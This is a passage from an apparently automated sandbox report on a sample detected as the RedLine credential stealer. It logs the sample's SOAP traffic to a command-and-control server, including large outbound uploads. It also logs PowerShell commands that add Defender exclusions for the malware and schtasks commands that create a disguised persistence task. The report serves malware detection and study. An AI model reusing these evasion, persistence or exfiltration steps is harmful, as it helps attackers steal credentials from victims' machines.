Jan 1, 2025 12:32:43.503354073 CET	61325	53	192.168.2.4	162.159.36.2
Jan 1, 2025 12:32:43.508407116 CET	53	61325	162.159.36.2	192.168.2.4
Jan 1, 2025 12:32:43.508455038 CET	61325	53	192.168.2.4	162.159.36.2

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 1, 2025 12:32:11.036171913 CET	57660	53	192.168.2.4	1.1.1.1
Jan 1, 2025 12:32:43.044418097 CET	53	64986	162.159.36.2	192.168.2.4
Jan 1, 2025 12:32:43.522758961 CET	53	52612	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 1, 2025 12:32:11.036171913 CET	192.168.2.4	1.1.1.1	0x1b8a	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 1, 2025 12:32:11.042937994 CET	1.1.1.1	192.168.2.4	0x1b8a	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

185.222.57.76:55615

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	185.222.57.76	55615	7312	C:\Users\user\Desktop\nzLoHpgAln.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 12:32:05.116972923 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.57.76:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jan 1, 2025 12:32:05.667452097 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 01 Jan 2025 11:32:01 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jan 1, 2025 12:32:10.713932991 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.57.76:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jan 1, 2025 12:32:10.883956909 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 12:32:10.998672009 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 5806 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 01 Jan 2025 11:32:06 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>202.10.61.55</b:string><b:string>124.150.139.36</b:string><b:string>128.90.43.18</b:string><b:string>128.90.60.20</b:string><b:string>191.101.157.171</b:string><b:string>128.90.161.3</b:string><b:string>139.186.206.86</b:string><b:string>140.228.24.62</b:string><b:string>146.70.132.7</b:string><b:string>212.102.44.82</b:string><b:string>146.70.144.87</b:string><b:string>192.42.116.209</b:string><b:string>154.61.71.50</b:string><b:string>154.61.71.50</b:string><b:string>111.7.100.42</b:string><b:string>222.98.34.226</b:string><b:string>40.73.35.80</b:string><b:string>34.141.245.25</b:string><b [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	185.222.57.76	55615	7312	C:\Users\user\Desktop\nzLoHpgAln.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 12:32:13.488487005 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.57.76:55615 Content-Length: 953964 Expect: 100-continue Accept-Encoding: gzip, deflate
Jan 1, 2025 12:32:15.007646084 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 01 Jan 2025 11:32:10 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49739	185.222.57.76	55615	7732	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 12:32:14.249686956 CET	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.222.57.76:55615 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jan 1, 2025 12:32:14.840851068 CET	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 01 Jan 2025 11:32:10 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jan 1, 2025 12:32:20.102173090 CET	223	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.222.57.76:55615 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jan 1, 2025 12:32:20.272017002 CET	25	IN	HTTP/1.1 100 Continue
Jan 1, 2025 12:32:20.377655029 CET	1236	IN	HTTP/1.1 200 OK Content-Length: 5806 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 01 Jan 2025 11:32:15 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>202.10.61.55</b:string><b:string>124.150.139.36</b:string><b:string>128.90.43.18</b:string><b:string>128.90.60.20</b:string><b:string>191.101.157.171</b:string><b:string>128.90.161.3</b:string><b:string>139.186.206.86</b:string><b:string>140.228.24.62</b:string><b:string>146.70.132.7</b:string><b:string>212.102.44.82</b:string><b:string>146.70.144.87</b:string><b:string>192.42.116.209</b:string><b:string>154.61.71.50</b:string><b:string>154.61.71.50</b:string><b:string>111.7.100.42</b:string><b:string>222.98.34.226</b:string><b:string>40.73.35.80</b:string><b:string>34.141.245.25</b:string><b [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	185.222.57.76	55615	7312	C:\Users\user\Desktop\nzLoHpgAln.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 12:32:15.015157938 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.57.76:55615 Content-Length: 953956 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jan 1, 2025 12:32:16.496181011 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 01 Jan 2025 11:32:12 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49748	185.222.57.76	55615	7732	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 12:32:23.024581909 CET	221	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.222.57.76:55615 Content-Length: 953783 Expect: 100-continue Accept-Encoding: gzip, deflate
Jan 1, 2025 12:32:24.490134001 CET	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 01 Jan 2025 11:32:20 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	185.222.57.76	55615	7732	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe

Timestamp	Bytes transferred	Direction	Data
Jan 1, 2025 12:32:24.497710943 CET	241	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.222.57.76:55615 Content-Length: 953775 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jan 1, 2025 12:32:25.971251011 CET	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Wed, 01 Jan 2025 11:32:21 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	06:31:55
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\nzLoHpgAln.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nzLoHpgAln.exe"
Imagebase:	0x40000
File size:	646'144 bytes
MD5 hash:	9F417A8434A3EA2932B0A23EBAE7E7FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1754649711.0000000003C91000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	06:32:02
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nzLoHpgAln.exe"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	06:32:02
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	06:32:02
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	06:32:02
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	06:32:02
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpC18A.tmp"
Imagebase:	0x670000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	06:32:02
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	06:32:02
Start date:	01/01/2025
Path:	C:\Users\user\Desktop\nzLoHpgAln.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\nzLoHpgAln.exe"
Imagebase:	0xa60000
File size:	646'144 bytes
MD5 hash:	9F417A8434A3EA2932B0A23EBAE7E7FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000008.00000002.1856986436.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	06:32:02
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:32:03
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
Imagebase:	0x7d0000
File size:	646'144 bytes
MD5 hash:	9F417A8434A3EA2932B0A23EBAE7E7FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000A.00000002.1851476020.0000000004435000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000A.00000002.1851476020.0000000003C31000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	06:32:04
Start date:	01/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	06:32:12
Start date:	01/01/2025
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wZWwzQVEakJvEU" /XML "C:\Users\user\AppData\Local\Temp\tmpE7EE.tmp"
Imagebase:	0x670000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	06:32:12
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	06:32:12
Start date:	01/01/2025
Path:	C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\wZWwzQVEakJvEU.exe"
Imagebase:	0xde0000
File size:	646'144 bytes
MD5 hash:	9F417A8434A3EA2932B0A23EBAE7E7FA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	06:32:12
Start date:	01/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	12.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	5.6%
Total number of Nodes:	302
Total number of Limit Nodes:	17

Executed Functions

Function 09C32030 Relevance: 8.2, Strings: 6, Instructions: 680
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Hbq, xrefs: 09C32795
Hbq, xrefs: 09C3270B
lq?, xrefs: 09C32069
Hbq, xrefs: 09C325F1
Hbq, xrefs: 09C32684
Hbq, xrefs: 09C32853

Memory Dump Source

